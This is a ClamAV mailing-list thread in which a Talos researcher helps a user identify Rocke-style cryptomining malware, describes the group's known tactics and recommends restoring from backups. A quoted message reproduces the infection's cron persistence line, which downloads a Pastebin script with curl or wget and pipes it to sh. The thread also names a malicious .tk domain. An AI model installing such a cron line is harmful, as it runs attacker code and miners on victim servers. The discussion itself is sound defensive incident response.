[clamav-users] LSD Malwares

Andrew Williams awillia2 at sourcefire.com
Fri Apr 26 22:36:15 UTC 2019 

Xavier,

>From the information you provided in your initial email, it sounds like the
malware you encountered is described in-depth here:

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

That blog post provides a lot of insight into what the malware they
analyzed did, which will hopefully provide you with a way to better
understand what the malware may have done on your machines.  It's difficult
to know for sure, though, since the one you encountered may have had
differences to the one described.  Your best bet to remediate is to just
restore the server from known-good backups, if possible.

At the end of last year, we published a blog post that tracked three groups
spreading this type of malware.  From
https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html,
the groups tended to follow these TTPs:
- Used Malicious shell scripts masquerading as JPEG files with the name
"logo*.jpg" that install cron jobs and download and execute miners.
- Used variants of the open-source miner XMRig intended for botnet mining,
with versions dependent on the victim's architecture.
- Scanned for and attempted to exploit recently published vulnerabilities
in servers such as Apache Struts2, Oracle WebLogic and Drupal.
- Used malicious scripts and malware hosted on Pastebin sites, Git
repositories and domains with .tk TLDs.

As you can tell, there's a lot of overlap between all of these, and it's
not uncommon for one actor to take the scripts and binaries used by another
and start using them (with slight modifications to use different C2, mine
to a different wallet, etc.)

Since there's so much overlap between tools and techniques, it's difficult
to say for sure, but at first glance the infrastructure described in the
Anomali blog post appears related to that of the malware described by these
two articles as well:

Nov 2018:
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth
Feb 2019:
https://blog.trendmicro.com/trendlabs-security-intelligence/linux-coin-miner-copied-scripts-from-korkerds-removes-all-other-malware-and-miners/

-Andrew

Andrew Williams
Malware Research Engineer
Cisco Talos



On Thu, Apr 25, 2019 at 11:27 PM Xavier Maysonnave via clamav-users <
clamav-users at lists.clamav.net> wrote:

> Hi All,
>
> Thanks for your feedback.
> I'm going to report to Cloudflare this URL.
>
> However keep in mind that there are other URLs who are involved in this
> family.
> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
> https://pastebin.com/raw/wR3ETdbi)|sh
> This one targets Jenkins, another popular OpenSource tool, not used on our
> infrastructure though.
>
> I'm still very interested with the consequences of this malwares. Any
> hints will be greatly appreciated.
>
> Thanks.
>
> Light
>
> Pudhuveedu / Xavier
>
> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>
>
> Le ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <
> clamav-users at lists.clamav.net> a écrit :
>
>> The same applies: Report it. Cloudflare will either forward the
>> complaint for you, or block the offending URL (or both).
>>
>> On 2019-04-25 19:16, Dennis Peterson wrote:
>> > That domain is hosted on a cloudflare IP block. They're become part of
>> > the problem.
>> >
>> > dp
>> >
>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>> >> hosting provider & domain registrar that they are hosting malware and
>> >> get that site shut down...
>> >>
>>
>> _______________________________________________
>>
>> clamav-users mailing list
>> clamav-users at lists.clamav.net
>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>
>>
>> Help us build a comprehensive ClamAV guide:
>> https://github.com/vrtadmin/clamav-faq
>>
>> http://www.clamav.net/contact.html#ml
>>
>
> _______________________________________________
>
> clamav-users mailing list
> clamav-users at lists.clamav.net
> https://lists.clamav.net/mailman/listinfo/clamav-users
>
>
> Help us build a comprehensive ClamAV guide:
> https://github.com/vrtadmin/clamav-faq
>
> http://www.clamav.net/contact.html#ml
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.clamav.net/pipermail/clamav-users/attachments/20190426/9450df7b/attachment.htm>

More information about the clamav-users mailing list